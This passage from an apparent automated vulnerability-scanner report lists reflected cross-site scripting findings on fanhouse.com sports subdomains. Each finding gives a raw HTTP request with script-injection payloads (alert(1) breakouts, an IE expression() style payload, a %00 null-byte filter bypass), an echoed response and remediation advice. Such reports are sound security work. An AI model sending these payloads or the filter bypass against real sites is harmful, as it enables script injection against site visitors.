GET /2010/12/15/bob-fellers-delivery-fierce-to-the-finish/?f736a"-alert(1)-"bb8742feec7=1 HTTP/1.1 Host: mlb.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code) ...[SNIP]...
2.22. http://nba.fanhouse.com/2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9132a"-alert(1)-"710ccf93e31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/?9132a"-alert(1)-"710ccf93e31=1 HTTP/1.1 Host: nba.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
var s_code=s_265.t();if(s_code)document ...[SNIP]...
2.23. http://nba.fanhouse.com/2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895aa"><script>alert(1)</script>2eb9bc331ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/?895aa"><script>alert(1)</script>2eb9bc331ff=1 HTTP/1.1 Host: nba.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nba.fanhouse.com/2010/12/15/boston-celtics-vs-new-york-knicks-rivalry-shootout-msg/?895aa"><script>alert(1)</script>2eb9bc331ff=1"/> ...[SNIP]...
2.24. http://nba.fanhouse.com/2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e4f"-alert(1)-"9476da736df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/?98e4f"-alert(1)-"9476da736df=1 HTTP/1.1 Host: nba.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
2.25. http://nba.fanhouse.com/2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59f53"><script>alert(1)</script>8db59357966 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/?59f53"><script>alert(1)</script>8db59357966=1 HTTP/1.1 Host: nba.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nba.fanhouse.com/2010/12/15/mesmerizing-photo-of-james-and-wade-was-one-incredible-feat/?59f53"><script>alert(1)</script>8db59357966=1"/> ...[SNIP]...
2.26. http://nba.fanhouse.com/2010/12/15/nets-lakers-rockets-trade-scorecard/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nba.fanhouse.com
Path:
/2010/12/15/nets-lakers-rockets-trade-scorecard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 512bb"><script>alert(1)</script>40d758904e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/nets-lakers-rockets-trade-scorecard/?512bb"><script>alert(1)</script>40d758904e7=1 HTTP/1.1 Host: nba.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nba.fanhouse.com/2010/12/15/nets-lakers-rockets-trade-scorecard/?512bb"><script>alert(1)</script>40d758904e7=1"/> ...[SNIP]...
2.27. http://nba.fanhouse.com/2010/12/15/nets-lakers-rockets-trade-scorecard/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nba.fanhouse.com
Path:
/2010/12/15/nets-lakers-rockets-trade-scorecard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fa15"-alert(1)-"3fd2331c1bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/nets-lakers-rockets-trade-scorecard/?4fa15"-alert(1)-"3fd2331c1bb=1 HTTP/1.1 Host: nba.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0485"style%3d"x%3aexpression(alert(1))"5066b35b895 was submitted in the REST URL parameter 3. This input was echoed as d0485"style="x:expression(alert(1))"5066b35b895 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /2010/12/15d0485"style%3d"x%3aexpression(alert(1))"5066b35b895/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/ HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="referer" value="http://ncaafootball.fanhouse.com:1080/2010/12/15d0485"style="x:expression(alert(1))"5066b35b895/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/"> ...[SNIP]...
2.29. http://ncaafootball.fanhouse.com/2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5b14"-alert(1)-"ef2f3406a15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/?d5b14"-alert(1)-"ef2f3406a15=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
2.30. http://ncaafootball.fanhouse.com/2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5b47"><script>alert(1)</script>aaa0c01f7e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/?e5b47"><script>alert(1)</script>aaa0c01f7e5=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://ncaafootball.fanhouse.com/2010/12/15/michael-haywood-reportedly-to-be-named-new-pitt-football-coach/?e5b47"><script>alert(1)</script>aaa0c01f7e5=1"/> ...[SNIP]...
2.31. http://ncaafootball.fanhouse.com/2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b25"-alert(1)-"9e8161e7035 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/?53b25"-alert(1)-"9e8161e7035=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
2.32. http://ncaafootball.fanhouse.com/2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdd0e"><script>alert(1)</script>34f7b6092c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/?cdd0e"><script>alert(1)</script>34f7b6092c7=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://ncaafootball.fanhouse.com/2010/12/15/villanova-rowan-football-players-get-in-the-game-save-lives/?cdd0e"><script>alert(1)</script>34f7b6092c7=1"/> ...[SNIP]...
2.33. http://nfl.fanhouse.com/2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaa60"><script>alert(1)</script>a320c1aa488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/?aaa60"><script>alert(1)</script>a320c1aa488=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/?aaa60"><script>alert(1)</script>a320c1aa488=1"/> ...[SNIP]...
2.34. http://nfl.fanhouse.com/2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aad1c"-alert(1)-"79989e1836e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/nfl-picks-week-15-nfc-east-up-for-grabs-as-eagles-giants-clash/?aad1c"-alert(1)-"79989e1836e=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6edf0"-alert(1)-"36b548b3c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /6edf0"-alert(1)-"36b548b3c4c/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007f9b5"><script>alert(1)</script>329e06b4101 was submitted in the REST URL parameter 1. This input was echoed as 7f9b5"><script>alert(1)</script>329e06b4101 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /%007f9b5"><script>alert(1)</script>329e06b4101/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:15:47 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999927 Connection: Keep-Alive Content-Type: text/html Content-Length: 25555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/%007f9b5"><script>alert(1)</script>329e06b4101/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00b76ba"-alert(1)-"aa1ffaece33 was submitted in the REST URL parameter 1. This input was echoed as b76ba"-alert(1)-"aa1ffaece33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2010%00b76ba"-alert(1)-"aa1ffaece33/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:17:34 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999975 Connection: Keep-Alive Content-Type: text/html Content-Length: 25533
var s_code=s_265.t();if(s_code)documen ...[SNIP]...
2.38. http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac329"><script>alert(1)</script>767a7aaaf81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?ac329"><script>alert(1)</script>767a7aaaf81=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?ac329"><script>alert(1)</script>767a7aaaf81=1"/> ...[SNIP]...
2.39. http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0b0f"-alert(1)-"4a7980ce5d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?b0b0f"-alert(1)-"4a7980ce5d4=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00d9a0d"-alert(1)-"cf3cf947c70 was submitted in the REST URL parameter 1. This input was echoed as d9a0d"-alert(1)-"cf3cf947c70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2010%00d9a0d"-alert(1)-"cf3cf947c70/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:15:47 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999936 Connection: Keep-Alive Content-Type: text/html Content-Length: 25533
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7615"><script>alert(1)</script>de4fd2b89eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2010a7615"><script>alert(1)</script>de4fd2b89eb/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea9c0"><script>alert(1)</script>0744407f85b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ea9c0"><script>alert(1)</script>0744407f85b/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/ea9c0"><script>alert(1)</script>0744407f85b/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/"/> ...[SNIP]...
2.43. http://nfl.fanhouse.com/2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3390"><script>alert(1)</script>fe81c8717e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/?d3390"><script>alert(1)</script>fe81c8717e7=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://nfl.fanhouse.com/2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/?d3390"><script>alert(1)</script>fe81c8717e7=1"/> ...[SNIP]...
2.44. http://nfl.fanhouse.com/2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed13a"-alert(1)-"cb934aa2908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/sal-alosi-now-suspended-indefinitely-after-jets-find-new-inform/?ed13a"-alert(1)-"cb934aa2908=1 HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11e67"><script>alert(1)</script>836c71c6c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
